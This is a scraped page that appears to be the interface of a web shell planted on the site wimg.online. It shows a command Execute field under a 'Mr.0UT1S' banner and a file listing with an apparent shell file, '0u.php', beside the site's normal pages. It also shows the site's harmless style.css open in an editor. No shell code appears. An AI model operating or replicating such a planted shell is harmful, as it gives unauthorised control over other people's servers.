home
/
aioutajg
/
wimg.online
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
[DIR] .well-known
N/A
[DIR] images
N/A
0u.php
37.68 KB
Rename
Delete
Wimg.online.zip
226.95 KB
Rename
Delete
about-tool.php
2.40 KB
Rename
Delete
about-us.php
3.91 KB
Rename
Delete
ads.txt
58 bytes
Rename
Delete
body.php
4.64 KB
Rename
Delete
contact-us.php
2.41 KB
Rename
Delete
cookies-policy.php
4.56 KB
Rename
Delete
disclaimer.php
3.56 KB
Rename
Delete
dmca.php
4.42 KB
Rename
Delete
error_log
1.38 KB
Rename
Delete
faqs.php
6.07 KB
Rename
Delete
favicon.ico
187.10 KB
Rename
Delete
features.php
3.84 KB
Rename
Delete
footer.php
1.16 KB
Rename
Delete
googlea90f9bc5efd6900b.html
53 bytes
Rename
Delete
header.php
3.17 KB
Rename
Delete
how-to-use.php
3.15 KB
Rename
Delete
index.php
1.49 KB
Rename
Delete
logo.png
6.41 KB
Rename
Delete
privacy-policy.php
6.81 KB
Rename
Delete
robots.txt
144 bytes
Rename
Delete
script.js
4.44 KB
Rename
Delete
sitemap.xml
1.45 KB
Rename
Delete
style.css
8.86 KB
Rename
Delete
terms-and-conditions.php
4.88 KB
Rename
Delete
body { font-family: Arial, sans-serif; text-align: center; background-color: #f4f4f4; } /* Header and Menu Styles */ header { background-color: #333; padding: 10px 0; } .menu { display: flex; align-items: center; justify-content: flex-start; padding: 0 20px; } .menu a { text-decoration: none; color: white; padding: 14px 20px; text-align: center; } .menu .site-logo-image { height: 40px; vertical-align: middle; } .menu .menu-btn { flex-grow: 0; } .menu .menu-btn.active { background-color: #0056b3; border-radius: 4px; } .menu a:hover { background-color: #0056b385; border-radius: 4px; } /* Mobile Menu Toggle */ .menu .icon { display: none; } /* Responsive Menu - Toggle */ @media screen and (max-width: 600px) { .menu a:not(:first-child) { display: none; } .menu a.icon { display: block; } } /* Responsive Menu - Show Items in Column */ @media screen and (max-width: 600px) { .menu.responsive { flex-direction: column; /* Stack items vertically */ position: relative; } .menu.responsive a { display: block; text-align: left; width: 100%; /* Make each menu item take full width */ padding: 10px 20px; /* Adjust padding for better spacing */ box-sizing: border-box; /* Ensure padding doesn't affect width */ } .menu.responsive a.icon { position: absolute; right: 0; top: 0; } } .content { margin-top: 20px; background-color: white; padding: 20px; border-radius: 10px; box-shadow: 0 0 10px rgba(0,0,0,0.1); } #imageCanvas { border: 1px solid #ddd; margin-top: 20px; max-width: 400px; position: relative; /* Make the canvas a positioning reference for the watermark */ overflow: hidden; /* Prevent overflow of the watermark */ } button { padding: 10px 20px; background-color: #28a745; color: white; border: none; border-radius: 5px; cursor: pointer; } button:hover { background-color: #218838; } /* General Section Styling */ section { padding: 60px 20px; /* Adds padding to the top and bottom, and less on the sides */ margin: 20px 0; /* Adds space between sections */ background-color: #f9f9f9; /* Light background for sections */ border-radius: 10px; /* Rounded corners for sections */ box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1); /* Subtle shadow for depth */ } /* Section Heading */ section h2 { font-size: 2em; /* Larger font size for section headings */ margin-bottom: 20px; /* Space below heading */ color: #333; /* Darker text color */ text-align: center; /* Center-align the section headings */ font-family: 'Arial', sans-serif; /* Clean, sans-serif font */ } /* Section Paragraphs */ section p, section li { font-size: 1.1em; /* Slightly larger than default font size for readability */ line-height: 1.6; /* Increased line height for better text spacing */ color: #555; /* Softer text color for readability */ margin-bottom: 15px; /* Space between paragraphs and list items */ font-family: 'Verdana', sans-serif; /* Professional sans-serif font */ } /* Ordered Lists (How to Use) */ section ol { counter-reset: section; /* Resets the counter for ordered lists */ margin-left: 20px; /* Indent the list */ } section ol li { position: relative; /* For numbering */ margin-bottom: 15px; /* Space between list items */ padding-left: 25px; /* Space for custom counter */ } section ol li:before { counter-increment: section; /* Increment the counter */ content: counter(section) ". "; /* Displays the current count */ position: absolute; /* Absolute positioning for the counter */ left: 0; /* Align to the left */ color: #ff6f61; /* Custom color for the counter */ font-weight: bold; /* Bold counter */ } /* Unordered Lists (Features) */ section ul { margin-left: 20px; /* Indent the list */ list-style-type: disc; /* Default bullet style */ } section ul li { margin-bottom: 10px; /* Space between list items */ padding-left: 10px; /* Space for bullet */ } /* FAQ Section */ section h3 { font-size: 1.5em; /* Medium font size for FAQ questions */ margin-top: 30px; /* Space above each FAQ question */ margin-bottom: 10px; /* Space below each FAQ question */ color: #0056b3; /* Distinct color for FAQ questions */ } section p { margin-bottom: 20px; /* Additional space below FAQ answers */ } /* Responsive Design */ @media (max-width: 768px) { section { padding: 40px 15px; /* Reduced padding for smaller screens */ } section h2 { font-size: 1.75em; /* Slightly smaller heading on mobile */ } section p, section li { font-size: 1em; /* Adjust text size for readability on mobile */ } section h3 { font-size: 1.25em; /* Smaller FAQ question text on mobile */ } } /* Additional Styling (Optional) */ /* You can add more specific styles here if needed */ .watermark-text { position: absolute; /* Ensure the watermark is positioned relative to the canvas */ color: rgba(255, 255, 255, 0.5); /* Semi-transparent white text */ font-size: 20px; /* Adjust font size as needed */ white-space: nowrap; /* Prevent text from wrapping */ } /* Adjustments to ensure watermark stays inside the canvas */ .top-left { top: 10px; /* Offset from the top */ left: 10px; /* Offset from the left */ } .top-center { top: 10px; left: 50%; transform: translateX(-50%); /* Center horizontally */ } .top-right { top: 10px; right: 10px; } .middle-left { top: 50%; left: 10px; transform: translateY(-50%); } .middle-center { top: 50%; left: 50%; transform: translate(-50%, -50%); /* Center both horizontally and vertically */ } .middle-right { top: 50%; right: 10px; transform: translateY(-50%); } .bottom-left { bottom: 10px; left: 10px; } .bottom-center { bottom: 10px; left: 50%; transform: translateX(-50%); } .bottom-right { bottom: 10px; right: 10px; } .content { margin: auto; padding: 20px; border: 1px solid #ccc; border-radius: 8px; background-color: #f9f9f9; box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1); margin-top: 20px; } h2 { text-align: center; color: #333; } .opts-row { display: flex; justify-content: space-between; margin-bottom: 15px; flex-wrap: wrap; } .opts { flex: 1; /* Flexbox to evenly distribute space */ padding: 20px; } .opts:last-child { margin-right: 0; /* Remove margin for the last item */ } label { display: block; margin-bottom: 5px; font-weight: bold; } .input-text, .input-number, .input-color, .select-box { padding: 10px; border: 1px solid #ccc; border-radius: 4px; font-size: 16px; } .file-input { padding: 10px; border: 1px solid #ccc; border-radius: 4px; margin-bottom: 15px; } .apply-button { background-color: #0056b3; color: #fff; border: none; padding: 10px 15px; font-size: 16px; border-radius: 4px; cursor: pointer; display: block; margin: 0 auto; } .apply-button:hover { background-color: #007bff; } .canvas-display { margin-top: 20px; border: 1px solid #ccc; display: block; margin: 20px auto; } .download-link { display: block; text-align: center; margin-top: 15px; color: #0056b3; font-weight: bold; } .download-link:hover { text-decoration: underline; } .footer { background-color: #333; color: #fff; padding: 20px 0; text-align: center; position: relative; } .footer .logo { max-width: 150px; margin: 20px 0; } .footer-menu { margin-bottom: 20px; } .footer-menu ul { list-style-type: none; padding: 0; margin: 0; display: flex; justify-content: center; flex-wrap: wrap; /* Wrap menu items on smaller screens */ } .footer-menu ul li { margin: 0 15px; } .footer-menu ul li a { color: #fff; text-decoration: none; font-weight: bold; transition: color 0.3s ease; } .footer-menu ul li a:hover { color: #007bff; /* Change color on hover */ } .footer p { margin-top: 10px; font-size: 14px; } .footer a { display: inline-block; /* Makes the entire area clickable */ padding: 10px 15px; /* Adds padding to increase the touch target size */ margin: 5px 0; /* Adds spacing between each link */ text-decoration: none; color: #ffffff; } .footer a:hover { text-decoration: underline; }
Save